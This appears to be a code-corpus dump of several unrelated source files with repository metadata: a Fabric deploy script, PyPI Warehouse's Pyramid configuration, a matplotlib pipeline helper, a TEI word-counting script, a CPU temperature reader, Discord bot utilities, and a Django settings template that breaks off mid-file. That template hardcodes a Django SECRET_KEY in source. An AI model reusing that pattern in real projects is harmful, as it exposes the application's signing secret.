print red("Missing hosts. Printing helptext.")
help ()
sys.exit ()
def _install_local_requirements ():
path_file = os.path.join (env.path_home, 'REQUIREMENTS.txt')
if files.exists (path_file):
with cd ('%s' % env.path_full_release):
run ('source %svirtualenv/bin/activate; pip install -r %s' % (env.path_root, path_file))
print (green ('Installed local requirements (%s) in virtual environment' % path_file))
else:
print (red ('No local requirements (%s)' % path_file))
def _syncdb ():
with cd (env.path_current):
run ('source %svirtualenv/bin/activate; ./manage.py syncdb --noinput' % env.path_root)
print (green ('Ran syncdb'))
def _migrate ():
with cd (env.path_current):
run ('source %svirtualenv/bin/activate; ./manage.py migrate' % env.path_root)
print (green ('Ran migrate'))
def _restart_webserver ():
# FIXME: this could be too Debian specific for real reuse. I don't know, haven't used anything but Debian in a long while. :-)
sudo ('/usr/sbin/service apache2 restart', shell=False)
print (green ('Restarted apache2'))
def _configure_webserver ():
path_sfile = os.path.join (env.path_current, env.filename_apacheconf)
if files.exists (path_sfile):
path_dfile = os.path.join (env.path_apache2_sites_available, env.project_name)
sudo ('/bin/cp -f %s %s' % (path_sfile, path_dfile), shell=False)
sudo ('/usr/sbin/a2ensite %s' % env.project_name, shell=False)
print (green ('Configured apache2 and activated site'))
else:
print (red ("Didn't configure apache2, no config file found."))
def _collectstatic ():
with cd (env.path_current):
run ('source %svirtualenv/bin/activate; ./manage.py collectstatic --noinput' % env.path_root)
print (green ('Ran collectstatic'))
def _put_revision_number ():
local ('bzr revno > /tmp/%s' % env.release)
put ('/tmp/%s' % env.release, '%s/.bzr_rev' % env.path_full_release, mode=0750)
local ('rm /tmp/%s' % env.release)
def deploy ():
_check_hosts ()
_environment ()
_upload_and_unpack ()
_create_virtualenv ()
_install_requirements ()
_install_local_requirements ()
_symlink_local_settings ()
_symlink_local_sqlite ()
_symlink_current_release ()
_syncdb ()
_migrate ()
_collectstatic ()
_configure_webserver ()
_restart_webserver ()
_put_revision_number ()
_set_release_permissions ()
def help ():
print ""
print "deployment script for lancms2"
print ""
print "Only available command is 'deploy'."
print "Remember to define host (-H [email protected])"
print "Please don't use this if you don't know what it does! No warranties!"
| gpl-2.0 | -6,103,830,826,268,953,000 | 31.87931 | 127 | 0.68502 | false |
pypa/warehouse | warehouse/config.py | 1 | 19675 | # Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import distutils.util
import enum
import os
import shlex
import transaction
from pyramid import renderers
from pyramid.config import Configurator as _Configurator
from pyramid.response import Response
from pyramid.security import Allow, Authenticated
from pyramid.tweens import EXCVIEW
from pyramid_rpc.xmlrpc import XMLRPCRenderer
from warehouse.errors import BasicAuthBreachedPassword
from warehouse.utils.static import ManifestCacheBuster
from warehouse.utils.wsgi import HostRewrite, ProxyFixer, VhmRootRemover
class Environment(enum.Enum):
production = "production"
development = "development"
class Configurator(_Configurator):
def add_wsgi_middleware(self, middleware, *args, **kwargs):
middlewares = self.get_settings().setdefault("wsgi.middlewares", [])
middlewares.append((middleware, args, kwargs))
def make_wsgi_app(self, *args, **kwargs):
# Get the WSGI application from the underlying configurator
app = super().make_wsgi_app(*args, **kwargs)
# Look to see if we have any WSGI middlewares configured.
for middleware, args, kw in self.get_settings()["wsgi.middlewares"]:
app = middleware(app, *args, **kw)
# Finally, return our now wrapped app
return app
class RootFactory:
__parent__ = None
__name__ = None
__acl__ = [
(Allow, "group:admins", "admin"),
(Allow, "group:moderators", "moderator"),
(Allow, Authenticated, "manage:user"),
]
def __init__(self, request):
pass
def require_https_tween_factory(handler, registry):
if not registry.settings.get("enforce_https", True):
return handler
def require_https_tween(request):
# If we have an :action URL and we're not using HTTPS, then we want to
# return a 403 error.
if request.params.get(":action", None) and request.scheme != "https":
resp = Response("SSL is required.", status=403, content_type="text/plain")
resp.status = "403 SSL is required"
resp.headers["X-Fastly-Error"] = "803"
return resp
return handler(request)
return require_https_tween
def activate_hook(request):
if request.path.startswith(("/_debug_toolbar/", "/static/")):
return False
return True
def commit_veto(request, response):
    # By default pyramid_tm will veto the commit anytime request.exc_info is not
    # None; we copy that logic with one difference: we still commit if the
    # exception was a BreachedPassword.
# TODO: We should probably use a registry or something instead of hardcoded.
exc_info = getattr(request, "exc_info", None)
if exc_info is not None and not isinstance(exc_info[1], BasicAuthBreachedPassword):
return True
def template_view(config, name, route, template, route_kw=None, view_kw=None):
if route_kw is None:
route_kw = {}
if view_kw is None:
view_kw = {}
config.add_route(name, route, **route_kw)
config.add_view(renderer=template, route_name=name, **view_kw)
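# Illustrative use of the template_view directive (the route and template
# names below are hypothetical; the directive itself is registered in
# configure() further down):
#   config.add_template_view("help", "/help/", "pages/help.html")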
def maybe_set(settings, name, envvar, coercer=None, default=None):
if envvar in os.environ:
value = os.environ[envvar]
if coercer is not None:
value = coercer(value)
settings.setdefault(name, value)
elif default is not None:
settings.setdefault(name, default)
def maybe_set_compound(settings, base, name, envvar):
if envvar in os.environ:
value = shlex.split(os.environ[envvar])
kwargs = {k: v for k, v in (i.split("=") for i in value[1:])}
settings[".".join([base, name])] = value[0]
for key, value in kwargs.items():
settings[".".join([base, key])] = value
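# Illustrative expansion performed by maybe_set_compound() (values made up):
# with FILES_BACKEND="warehouse.packaging.services.LocalFileStorage path=/srv/files",
# maybe_set_compound(settings, "files", "backend", "FILES_BACKEND") sets
#   settings["files.backend"] = "warehouse.packaging.services.LocalFileStorage"
#   settings["files.path"] = "/srv/files"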
def configure(settings=None):
if settings is None:
settings = {}
# Add information about the current copy of the code.
maybe_set(settings, "warehouse.commit", "SOURCE_COMMIT", default="null")
# Set the environment from an environment variable, if one hasn't already
# been set.
maybe_set(
settings,
"warehouse.env",
"WAREHOUSE_ENV",
Environment,
default=Environment.production,
)
# Pull in default configuration from the environment.
maybe_set(settings, "warehouse.token", "WAREHOUSE_TOKEN")
maybe_set(settings, "warehouse.num_proxies", "WAREHOUSE_NUM_PROXIES", int)
maybe_set(settings, "warehouse.theme", "WAREHOUSE_THEME")
maybe_set(settings, "warehouse.domain", "WAREHOUSE_DOMAIN")
maybe_set(settings, "forklift.domain", "FORKLIFT_DOMAIN")
maybe_set(settings, "warehouse.legacy_domain", "WAREHOUSE_LEGACY_DOMAIN")
maybe_set(settings, "site.name", "SITE_NAME", default="Warehouse")
maybe_set(settings, "aws.key_id", "AWS_ACCESS_KEY_ID")
maybe_set(settings, "aws.secret_key", "AWS_SECRET_ACCESS_KEY")
maybe_set(settings, "aws.region", "AWS_REGION")
maybe_set(settings, "gcloud.credentials", "GCLOUD_CREDENTIALS")
maybe_set(settings, "gcloud.project", "GCLOUD_PROJECT")
maybe_set(
settings, "warehouse.release_files_table", "WAREHOUSE_RELEASE_FILES_TABLE"
)
maybe_set(settings, "warehouse.trending_table", "WAREHOUSE_TRENDING_TABLE")
maybe_set(settings, "celery.broker_url", "BROKER_URL")
maybe_set(settings, "celery.result_url", "REDIS_URL")
maybe_set(settings, "celery.scheduler_url", "REDIS_URL")
maybe_set(settings, "database.url", "DATABASE_URL")
maybe_set(settings, "elasticsearch.url", "ELASTICSEARCH_URL")
maybe_set(settings, "elasticsearch.url", "ELASTICSEARCH_SIX_URL")
maybe_set(settings, "sentry.dsn", "SENTRY_DSN")
maybe_set(settings, "sentry.frontend_dsn", "SENTRY_FRONTEND_DSN")
maybe_set(settings, "sentry.transport", "SENTRY_TRANSPORT")
maybe_set(settings, "sessions.url", "REDIS_URL")
maybe_set(settings, "ratelimit.url", "REDIS_URL")
maybe_set(settings, "sessions.secret", "SESSION_SECRET")
maybe_set(settings, "camo.url", "CAMO_URL")
maybe_set(settings, "camo.key", "CAMO_KEY")
maybe_set(settings, "docs.url", "DOCS_URL")
maybe_set(settings, "ga.tracking_id", "GA_TRACKING_ID")
maybe_set(settings, "statuspage.url", "STATUSPAGE_URL")
maybe_set(settings, "token.password.secret", "TOKEN_PASSWORD_SECRET")
maybe_set(settings, "token.email.secret", "TOKEN_EMAIL_SECRET")
maybe_set(settings, "token.two_factor.secret", "TOKEN_TWO_FACTOR_SECRET")
maybe_set(
settings,
"warehouse.xmlrpc.search.enabled",
"WAREHOUSE_XMLRPC_SEARCH",
coercer=distutils.util.strtobool,
default=True,
)
maybe_set(settings, "warehouse.xmlrpc.cache.url", "REDIS_URL")
maybe_set(
settings,
"warehouse.xmlrpc.client.ratelimit_string",
"XMLRPC_RATELIMIT_STRING",
default="3600 per hour",
)
maybe_set(settings, "token.password.max_age", "TOKEN_PASSWORD_MAX_AGE", coercer=int)
maybe_set(settings, "token.email.max_age", "TOKEN_EMAIL_MAX_AGE", coercer=int)
maybe_set(
settings,
"token.two_factor.max_age",
"TOKEN_TWO_FACTOR_MAX_AGE",
coercer=int,
default=300,
)
maybe_set(
settings,
"token.default.max_age",
"TOKEN_DEFAULT_MAX_AGE",
coercer=int,
default=21600, # 6 hours
)
maybe_set_compound(settings, "files", "backend", "FILES_BACKEND")
maybe_set_compound(settings, "docs", "backend", "DOCS_BACKEND")
maybe_set_compound(settings, "origin_cache", "backend", "ORIGIN_CACHE")
maybe_set_compound(settings, "mail", "backend", "MAIL_BACKEND")
maybe_set_compound(settings, "metrics", "backend", "METRICS_BACKEND")
maybe_set_compound(settings, "breached_passwords", "backend", "BREACHED_PASSWORDS")
maybe_set_compound(settings, "malware_check", "backend", "MALWARE_CHECK_BACKEND")
# Add the settings we use when the environment is set to development.
if settings["warehouse.env"] == Environment.development:
settings.setdefault("enforce_https", False)
settings.setdefault("pyramid.reload_assets", True)
settings.setdefault("pyramid.reload_templates", True)
settings.setdefault("pyramid.prevent_http_cache", True)
settings.setdefault("debugtoolbar.hosts", ["0.0.0.0/0"])
settings.setdefault(
"debugtoolbar.panels",
[
".".join(["pyramid_debugtoolbar.panels", panel])
for panel in [
"versions.VersionDebugPanel",
"settings.SettingsDebugPanel",
"headers.HeaderDebugPanel",
"request_vars.RequestVarsDebugPanel",
"renderings.RenderingsDebugPanel",
"logger.LoggingPanel",
"performance.PerformanceDebugPanel",
"routes.RoutesDebugPanel",
"sqla.SQLADebugPanel",
"tweens.TweensDebugPanel",
"introspection.IntrospectionDebugPanel",
]
],
)
# Actually setup our Pyramid Configurator with the values pulled in from
# the environment as well as the ones passed in to the configure function.
config = Configurator(settings=settings)
config.set_root_factory(RootFactory)
# Register support for services
config.include("pyramid_services")
# Register metrics
config.include(".metrics")
# Register our CSRF support. We do this here, immediately after we've
# created the Configurator instance so that we ensure to get our defaults
# set ASAP before anything else has a chance to set them and possibly call
# Configurator().commit()
config.include(".csrf")
# Include anything needed by the development environment.
if config.registry.settings["warehouse.env"] == Environment.development:
config.include("pyramid_debugtoolbar")
# Register our logging support
config.include(".logging")
# We'll want to use Jinja2 as our template system.
config.include("pyramid_jinja2")
# Include our filters
config.include(".filters")
# Including pyramid_mailer for sending emails through SMTP.
config.include("pyramid_mailer")
# We want to use newstyle gettext
config.add_settings({"jinja2.newstyle": True})
# Our translation strings are all in the "messages" domain
config.add_settings({"jinja2.i18n.domain": "messages"})
# We also want to use Jinja2 for .html templates as well, because we just
# assume that all templates will be using Jinja.
config.add_jinja2_renderer(".html")
# Sometimes our files are .txt files and we still want to use Jinja2 to
# render them.
config.add_jinja2_renderer(".txt")
# Anytime we want to render a .xml template, we'll also use Jinja.
config.add_jinja2_renderer(".xml")
# We need to enable our Client Side Include extension
config.get_settings().setdefault(
"jinja2.extensions", ["warehouse.utils.html.ClientSideIncludeExtension"]
)
# We'll want to configure some filters for Jinja2 as well.
filters = config.get_settings().setdefault("jinja2.filters", {})
filters.setdefault("format_classifiers", "warehouse.filters:format_classifiers")
filters.setdefault("classifier_id", "warehouse.filters:classifier_id")
filters.setdefault("format_tags", "warehouse.filters:format_tags")
filters.setdefault("json", "warehouse.filters:tojson")
filters.setdefault("camoify", "warehouse.filters:camoify")
filters.setdefault("shorten_number", "warehouse.filters:shorten_number")
filters.setdefault("urlparse", "warehouse.filters:urlparse")
filters.setdefault("contains_valid_uris", "warehouse.filters:contains_valid_uris")
filters.setdefault("format_package_type", "warehouse.filters:format_package_type")
filters.setdefault("parse_version", "warehouse.filters:parse_version")
filters.setdefault("localize_datetime", "warehouse.filters:localize_datetime")
# We also want to register some global functions for Jinja
jglobals = config.get_settings().setdefault("jinja2.globals", {})
jglobals.setdefault("is_valid_uri", "warehouse.utils.http:is_valid_uri")
jglobals.setdefault("gravatar", "warehouse.utils.gravatar:gravatar")
jglobals.setdefault("gravatar_profile", "warehouse.utils.gravatar:profile")
jglobals.setdefault("now", "warehouse.utils:now")
# And some enums to reuse in the templates
jglobals.setdefault(
"RoleInvitationStatus", "warehouse.packaging.models:RoleInvitationStatus"
)
# We'll store all of our templates in one location, warehouse/templates
# so we'll go ahead and add that to the Jinja2 search path.
config.add_jinja2_search_path("warehouse:templates", name=".html")
config.add_jinja2_search_path("warehouse:templates", name=".txt")
config.add_jinja2_search_path("warehouse:templates", name=".xml")
# We want to configure our JSON renderer to sort the keys, and also to use
# an ultra compact serialization format.
config.add_renderer("json", renderers.JSON(sort_keys=True, separators=(",", ":")))
# Configure retry support.
config.add_settings({"retry.attempts": 3})
config.include("pyramid_retry")
# Configure our transaction handling so that each request gets its own
# transaction handler and the lifetime of the transaction is tied to the
# lifetime of the request.
config.add_settings(
{
"tm.manager_hook": lambda request: transaction.TransactionManager(),
"tm.activate_hook": activate_hook,
"tm.commit_veto": commit_veto,
"tm.annotate_user": False,
}
)
config.include("pyramid_tm")
# Register our XMLRPC service
config.include(".legacy.api.xmlrpc")
# Register our XMLRPC cache
config.include(".legacy.api.xmlrpc.cache")
    # Register support for XMLRPC and override its renderer to allow
# specifying custom dumps arguments.
config.include("pyramid_rpc.xmlrpc")
config.add_renderer("xmlrpc", XMLRPCRenderer(allow_none=True))
# Register support for our legacy action URLs
config.include(".legacy.action_routing")
# Register support for our domain predicates
config.include(".domain")
# Register support for template views.
config.add_directive("add_template_view", template_view, action_wrap=False)
# Register support for internationalization and localization
config.include(".i18n")
# Register the configuration for the PostgreSQL database.
config.include(".db")
# Register the support for Celery Tasks
config.include(".tasks")
# Register support for our rate limiting mechanisms
config.include(".rate_limiting")
config.include(".static")
config.include(".policy")
config.include(".search")
# Register the support for AWS and Google Cloud
config.include(".aws")
config.include(".gcloud")
# Register our session support
config.include(".sessions")
# Register our support for http and origin caching
config.include(".cache.http")
config.include(".cache.origin")
# Register support for sending emails
config.include(".email")
# Register our authentication support.
config.include(".accounts")
# Register support for Macaroon based authentication
config.include(".macaroons")
# Register support for malware checks
config.include(".malware")
# Register logged-in views
config.include(".manage")
# Allow the packaging app to register any services it has.
config.include(".packaging")
# Configure redirection support
config.include(".redirects")
# Register all our URL routes for Warehouse.
config.include(".routes")
# Include our admin application
config.include(".admin")
    # Register forklift, at least until we split it out into its own project.
config.include(".forklift")
# Block non HTTPS requests for the legacy ?:action= routes when they are
# sent via POST.
config.add_tween("warehouse.config.require_https_tween_factory")
# Enable compression of our HTTP responses
config.add_tween(
"warehouse.utils.compression.compression_tween_factory",
over=[
"warehouse.cache.http.conditional_http_tween_factory",
"pyramid_debugtoolbar.toolbar_tween_factory",
EXCVIEW,
],
)
# Enable Warehouse to serve our static files
prevent_http_cache = config.get_settings().get("pyramid.prevent_http_cache", False)
config.add_static_view(
"static",
"warehouse:static/dist/",
# Don't cache at all if prevent_http_cache is true, else we'll cache
# the files for 10 years.
cache_max_age=0 if prevent_http_cache else 10 * 365 * 24 * 60 * 60,
)
config.add_cache_buster(
"warehouse:static/dist/",
ManifestCacheBuster(
"warehouse:static/dist/manifest.json",
reload=config.registry.settings["pyramid.reload_assets"],
strict=not prevent_http_cache,
),
)
config.whitenoise_serve_static(
autorefresh=prevent_http_cache,
max_age=0 if prevent_http_cache else 10 * 365 * 24 * 60 * 60,
)
config.whitenoise_add_files("warehouse:static/dist/", prefix="/static/")
config.whitenoise_add_manifest(
"warehouse:static/dist/manifest.json", prefix="/static/"
)
# Enable support of passing certain values like remote host, client
# address, and protocol support in from an outer proxy to the application.
config.add_wsgi_middleware(
ProxyFixer,
token=config.registry.settings["warehouse.token"],
num_proxies=config.registry.settings.get("warehouse.num_proxies", 1),
)
# Protect against cache poisoning via the X-Vhm-Root headers.
config.add_wsgi_middleware(VhmRootRemover)
# Fix our host header when getting sent upload.pypi.io as a HOST.
# TODO: Remove this, this is at the wrong layer.
config.add_wsgi_middleware(HostRewrite)
# We want Sentry to be the last things we add here so that it's the outer
# most WSGI middleware.
config.include(".sentry")
# Register Content-Security-Policy service
config.include(".csp")
# Register Referrer-Policy service
config.include(".referrer_policy")
config.add_settings({"http": {"verify": "/etc/ssl/certs/"}})
config.include(".http")
# Add our theme if one was configured
if config.get_settings().get("warehouse.theme"):
config.include(config.get_settings()["warehouse.theme"])
# Scan everything for configuration
config.scan(
ignore=["warehouse.migrations.env", "warehouse.celery", "warehouse.wsgi"]
)
# Sanity check our request and responses.
# Note: It is very important that this go last. We need everything else that might
# have added a tween to be registered prior to this.
config.include(".sanity")
# Finally, commit all of our changes
config.commit()
return config
| apache-2.0 | 6,571,984,484,653,794,000 | 36.54771 | 88 | 0.67385 | false |
garywu/pypedream | pypedream/plot/_filt.py | 1 | 2685 | import numpy
has_matplotlib = True
try:
from matplotlib import pyplot, figure
except ImportError:
has_matplotlib = False
from dagpype._core import filters
def _make_relay_call(fn, name):
def new_fn(*args, **kwargs):
@filters
def _dagpype_internal_fn_act(target):
try:
while True:
target.send((yield))
except GeneratorExit:
fn(*args, **kwargs)
target.close()
return _dagpype_internal_fn_act
new_fn.__name__ = name
new_fn.__doc__ = """
    Convenience filter utility for the corresponding function in pyplot.
Example:
>>> source([1, 2, 3, 4]) | plot.xlabel('x') | plot.ylabel('y') | plot.title('xy') | (plot.plot() | plot.savefig('foo.png'))
"""
return new_fn
_try_fns = [
'annotate',
'arrow',
'autogen_docstring',
'autoscale',
'autumn',
'axes',
'axhline',
'axhspan',
'axis',
'axvline',
'axvspan',
'barbs',
'bone',
'box',
'broken_barh',
'cla',
'clabel',
'clf',
'clim',
'cm',
'cohere',
'colorbar',
'colormaps',
'colors',
'connect',
'cool',
'copper',
'csd',
'dedent',
'delaxes',
'docstring',
'draw',
'figaspect',
'figimage',
'figlegend',
'figtext',
'figure',
'fill',
'fill_between',
'fill_betweenx',
'flag',
'gca',
'gcf',
'gci',
'get',
'gray',
'grid',
'hold',
'hot',
'hsv',
'jet',
'locator_params',
'margins',
'minorticks_off',
'minorticks_on',
'normalize',
'over',
'pcolor',
'pcolormesh',
'pink',
'plotfile',
'plotting',
'polar',
'prism',
'psd',
'quiver',
'quiverkey',
'rc',
'register_cmap',
'rgrids',
'sca',
'sci',
'set_cmap',
'setp',
'silent_list',
'specgram',
'spectral',
'spring',
'spy',
'stem',
'step',
'subplot',
'subplot2grid',
'subplot_tool',
'subplots',
'subplots_adjust',
'summer',
'suptitle',
'table',
'text',
'thetagrids',
'tick_params',
'ticklabel_format',
'tight_layout',
'title',
'tricontour',
'tricontourf',
'tripcolor',
'triplot',
'twinx',
'twiny',
'winter',
'xlabel',
'xlim',
'xscale',
'xticks',
'ylabel',
'ylim',
'yscale',
'yticks']
_fns = []
if has_matplotlib:
for fn in _try_fns:
try:
exec('%s = _make_relay_call(pyplot.%s, "%s")' % (fn, fn, fn))
_fns.append(fn)
except AttributeError:
pass
| bsd-3-clause | -3,559,330,889,597,093,000 | 16.211538 | 131 | 0.480447 | false |
ericleasemorgan/EEBO-TCP-Workset-Browser | bin/make-index.py | 1 | 2042 | #!/usr/bin/env python
# make-index.py - read EEBO TEI files and output word frequencies as well as a "book"
# Eric Lease Morgan <[email protected]>
# June 8, 2015 - first investigations; based on HathiTrust work
# configure
STOPWORDS = './etc/stopwords-en.txt'
# require
import operator
import re
import sys
import libxml2
# sanity check
if ( len( sys.argv ) != 2 ) or ( sys.stdin.isatty() ) :
print "Usage: cat <xml> |", sys.argv[ 0 ], '<-b|-d>'
quit()
# get input; sanity check
flag = sys.argv[ 1 ]
# build a book?
if flag == '-b' : build_book = 1
elif flag == '-d' : build_book = 0
else :
print "Usage: cat <xml> |", sys.argv[ 0 ], '<-b|-d>'
quit()
# create an xpath parser with an xml file
xml = sys.stdin.read()
tei = libxml2.parseMemory( xml, len( xml ) )
context = tei.xpathNewContext()
context.xpathRegisterNs( 't', 'http://www.tei-c.org/ns/1.0' )
# parse
title = context.xpathEval( '/t:TEI/t:teiHeader/t:fileDesc/t:titleStmt/t:title/text()' )[ 0 ]
text = context.xpathEval( '/t:TEI/t:text' )[ 0 ].content
# normalize the text
text = re.sub( '\s+', ' ', text )
text = text.lower()
text = text.split()
# initialize output
words = {}
book = str( title ) + '\n'
# create a list of (English) stopwords
stopwords = {}
with open ( STOPWORDS ) as DATABASE :
for record in DATABASE : stopwords[ record.rstrip() ] = 1
# process each word in the text
for word in text :
# normalize some more; probably not 100% accurate
word = word.rstrip( '?:!.,;)' )
word = word.lstrip( '?:!.,;(' )
# filter out unwanted words
if len( word ) < 2 : continue
if re.match( '\d|\W', word ) : continue
if word in stopwords : continue
# build text file
if build_book : book = book + word + ' '
# or update the dictionary
else : words[ word ] = words.get( word, 0 ) + 1
# output book, or
if build_book : print book
# output the dictionary
else :
for tuple in sorted( words.items(), key=operator.itemgetter( 1 ), reverse=True ) :
print( tuple[ 0 ] + '\t' + str( tuple[ 1 ] ) )
# done
quit()
| gpl-2.0 | -2,400,946,947,724,106,000 | 22.744186 | 92 | 0.629285 | false |
mmcbride1/python-coretemp | coretemp/sensor_reading.py | 1 | 4790 | import re
import os
import sys
import subprocess
import sensors as r
import coretemp_log as log
import coretemp_config as conf
from collections import OrderedDict
''' Get sensor constants '''
from coretemp_constants import SUB_MAX_TYPE, SUB_CRT_TYPE, CHIP, NORM, HIGH, CRTC
class SensorReading:
''' Store sensor threshold '''
crit = []
high = []
''' Store log message '''
MSG = ""
''' Store sensor reading '''
read = OrderedDict()
''' Configuration '''
CONF = conf.Config("threshold").get_config()
ERRO = log.ExceptionLog()
def __init__(self):
"""
Constructor:
Set chip reading and log
message
"""
try:
self.__set_chip_read()
self.__set_message()
except Exception as ex:
self.ERRO.update_errlog(ex)
def get_reading(self):
"""
Get sensor reading
:return: sensor reading
"""
return self.read
def get_message(self):
"""
Get log message
:return: log message string
"""
return self.MSG
def get_failed(self):
"""
        Get only the readings deemed
        high or critical from
        the primary reading
:return: max/crt message string
"""
return re.sub(".*NORMAL.*\n?","",self.MSG)
def __collect_recommended(self, sub):
"""
Gets the recommended threshold
values as determined by the
sensor sub-feature set
:param str sub: the given sub-feature
"""
self.sub = sub
num = sub.get_value()
if sub.type == SUB_MAX_TYPE:
self.high.append(num)
if sub.type == SUB_CRT_TYPE:
self.crit.append(num)
def __avg(self, arr):
"""
Obtains the mean value
of the collection
:param list arr: any given list
:return: average value
"""
self.arr = arr
try:
avg = sum(arr)/float(len(arr))
return round(avg, 2)
except ZeroDivisionError as z:
self.ERRO.update_errlog(z)
return 0
def get_avg_read(self):
"""
Gets the average core value
of the list of chips on the
read
:return: average core value
"""
return self.__avg(self.read.values())
def __msg_str(self, k, v, i):
"""
Helper function to
build the log output message
:param str k: core #
:param str v: reading
:param str i: indicator
:return: formatted log message
"""
self.k = k
self.v = v
self.i = i
return "%s : %s -> %s\n" % (k, v, i)
def __set_defaults(self, arr):
"""
Sets default values for
the thresholds in the case that
none are provided in the config and
a reading cannot be obtained from
the chip
:param list arr: generated threshold list
:return: updated list with defaults
"""
self.arr = arr
for k, v in arr.items():
            if k == 'MAX' and v == 0:
                arr[k] = 86.0
            if k == 'CRT' and v == 0:
                arr[k] = 96.0
return arr
def get_threshold(self):
"""
The primary threshold setting
mechanism. Sets first from the
config then next from the recommended
values if no such properties exist
:return: dict containing max/crt values
"""
h = self.CONF['high']
c = self.CONF['crit']
        if h == "" or float(h) <= 0:
            h = self.__avg(self.high)
        if c == "" or float(c) <= 0:
            c = self.__avg(self.crit)
order = [float(h),float(c)]
high = min(order)
crit = max(order)
return {'MAX':high,'CRT':crit}
def __set_chip_read(self):
"""
Queries the chip applies result
to the 'read' dict. Then, collects the
recommended threshold values
"""
r.init()
try:
for x in r.iter_detected_chips(CHIP):
for f in x:
if "Core" in f.label:
self.read[f.label] = f.get_value()
for sub in f:
self.__collect_recommended(sub)
finally:
r.cleanup()
def __set_message(self):
"""
Builds the output (log) message
based on the standing of the chip
read and whether given thresholds
were reached
"""
th = self.__set_defaults(self.get_threshold())
for k, v in self.get_reading().items():
if v < th['MAX']:
self.MSG += self.__msg_str(k,v,NORM)
elif v >= th['MAX'] and v < th['CRT']:
self.MSG += self.__msg_str(k,v,HIGH)
elif v >= th['CRT']:
self.MSG += self.__msg_str(k,v,CRTC)
else:
self.MSG += self.__msg_str(k,v,"UNKNOWN")
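# Minimal usage sketch (assumes lm-sensors is configured and the coretemp
# configuration/log modules are importable):
#
#   reading = SensorReading()
#   print(reading.get_avg_read())  # mean of all core temperatures
#   print(reading.get_message())   # per-core log lines with indicators
#   print(reading.get_failed())    # only the lines not marked normal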
| mit | 2,297,865,307,303,243,800 | 23.564103 | 81 | 0.532777 | false |
inexactually/irisbot | utils.py | 1 | 2817 | import aiohttp
import inspect
import io
from os.path import split as path_split  # used by Bot.send_file below
import discord
from discord.ext import commands
import settings
def setting(name, default):
return getattr(settings, name, default)
def pretty_list(names, bold=True, conjunction='and', empty=''):
names = list(names)
if not names:
return empty
if bold:
names = ['**{}**'.format(name) for name in names]
sep = ' ' + conjunction if conjunction else ''
if len(names) == 1:
return names[0]
elif len(names) == 2:
return '{}{} {}'.format(names[0], sep, names[1])
else:
return '{},{} {}'.format(', '.join(names[:-1]), sep, names[-1])
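# Illustrative behavior of pretty_list() with the default arguments:
#   pretty_list(['a'])           -> '**a**'
#   pretty_list(['a', 'b'])      -> '**a** and **b**'
#   pretty_list(['a', 'b', 'c']) -> '**a**, **b**, and **c**'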
def is_local_check_failure(error):
"""This horrible hack lets a command error handler figure out if the
error originates from the command's own checks, rather than a
global check or some other sort of error.
"""
if isinstance(error, commands.CheckFailure):
if error.args:
return "check functions for command" in error.args[0]
# Copied from discord.ext.commands.bot.py. We need this because
# there's no way to override the formatting of the default Bot.reply.
def bot_get_variable(name):
stack = inspect.stack()
try:
for frames in stack:
try:
frame = frames[0]
current_locals = frame.f_locals
if name in current_locals:
return current_locals[name]
finally:
del frame
finally:
del stack
class Bot(commands.Bot):
"""A subclass of `discord.ext.commands.Bot` with some improvements.
"""
async def reply(self, content, *args, separator=' ', **kwargs):
# Now with custom separator support
author = bot_get_variable('_internal_author')
text = '{0.mention}{1}{2}'.format(author, separator, str(content))
return await self.say(text, *args, **kwargs)
async def send_file(self, destination, fp, *, filename=None, content=None, embed=None, tts=False):
# Now with embed support
channel_id, guild_id = await self._resolve_destination(destination)
if embed is not None:
embed = embed.to_dict()
try:
with open(fp, 'rb') as f:
buffer = io.BytesIO(f.read())
if filename is None:
_, filename = path_split(fp)
except TypeError:
buffer = fp
content = str(content) if content is not None else None
data = await self.http.send_file(channel_id, buffer, guild_id=guild_id,
filename=filename, content=content, embed=embed, tts=tts)
channel = self.get_channel(data.get('channel_id'))
message = self.connection._create_message(channel=channel, **data)
return message
| mit | 5,766,240,977,364,690,000 | 33.353659 | 102 | 0.599219 | false |
censof/ansible-deployment | django_app_server_db_server/deployment/templates/common.py | 1 | 3942 | import os.path
# Configuration modules.
from ._installed_apps import *
from ._middleware import *
from ._context_processors import *
from ._email import *
from ._eclaim import *
_ = lambda s: s
# Debugging mode.
DEBUG = False
TEMPLATE_DEBUG = False
if DEMO_MODE:
SEND_NOTIF_EMAILS = False
else:
SEND_NOTIF_EMAILS = True
# Project root directory.
_path = os.path.join(os.path.dirname(__file__), os.pardir)
BASE_DIR = os.path.abspath(os.path.join(_path, os.pardir))
# SQL scripts directory.
_parpath = os.path.join(BASE_DIR, os.pardir)
SQL_SCRIPTS_DIR = os.path.abspath(os.path.join(_parpath, 'sql_scripts'))
# SECURITY WARNING: keep the secret key used in production secret!
SECRET_KEY = 'wk9&6^ns(71^*i#8&=v#j53-cv#85csvl53zu4dp$w0x(k%zsz'
ALLOWED_HOSTS = ['{{ ansible_eth0.ipv4.address }}']
if DEMO_MODE:
HOST_URL = 'http://{{ ansible_eth0.ipv4.address }}:{}/'.format(DEMO_PORT)
else:
HOST_URL = 'http://{{ ansible_eth0.ipv4.address }}/'
LOGIN_URL = '/eclaim/login/'
ROOT_URLCONF = 'eclaim.urls'
WSGI_APPLICATION = 'wsgi.application'
# Absolute path to the directory that holds static files.
STATIC_ROOT = '{{ django_app_home }}/static_files'
# Static files (CSS, JavaScript, Images)
# https://docs.djangoproject.com/en/1.8/howto/static-files/
STATIC_URL = '/static/'
STATICFILES_DIRS = (
os.path.join(BASE_DIR, 'static'),
)
STATICFILES_FINDERS = (
'django.contrib.staticfiles.finders.FileSystemFinder',
'django.contrib.staticfiles.finders.AppDirectoriesFinder',
'compressor.finders.CompressorFinder',
)
# Compress static files.
COMPRESS_ENABLED = True
# Absolute path to the directory that holds media files.
MEDIA_ROOT = '{{ django_app_home }}/media_files'
MEDIA_URL = '/media/'
TEMPLATE_LOADERS = (
'django.template.loaders.filesystem.Loader',
'django.template.loaders.app_directories.Loader',
)
TEMPLATE_DIRS = (
# Put strings here, like "/home/html/django_templates" or "C:/www/django/templates".
# Always use forward slashes, even on Windows.
# Don't forget to use absolute paths, not relative paths.
os.path.join(BASE_DIR, 'templates'),
)
# Django Rest Framework.
REST_FRAMEWORK = {
